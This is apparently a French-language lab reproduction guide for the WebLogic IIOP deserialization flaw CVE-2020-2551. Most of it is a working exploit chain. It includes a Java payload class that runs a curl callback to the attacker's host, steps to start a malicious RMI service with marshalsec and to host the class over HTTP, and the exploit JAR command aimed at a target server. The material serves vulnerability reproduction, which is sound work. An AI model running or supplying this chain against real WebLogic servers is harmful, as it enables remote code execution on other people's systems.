
Weblogic IIOP CVE-2020-2551
Désérialisation IIOP de Weblogic
Weblogic 10.3.6 + JDK 1.6
JAR packagé Code d'extraction : a6ob
Téléchargez le fichier JAR, puis utilisez marshalsec pour démarrer un service RMI malveillant, compilez localement un fichier exp.java
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
Essayez de compiler avec la même version de JDK et les mêmes bibliothèques de dépendances (wlfullclient.jar) que celles utilisées par Weblogic puis démarrez un serveur web localement
python -m http.server --bind 0.0.0.0 80
Exécutez la commande suivante pour lancer le fichier JAR
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
Résultat attendu :

De nombreuses personnes signalent que la reproduction échoue. En consultant des articles en ligne, on constate que IIOP a un problème de mode NAT. Aujourd'hui, j'ai trouvé un article sur Xianzhi : https://xz.aliyun.com/t/7498. Veuillez vous y référer.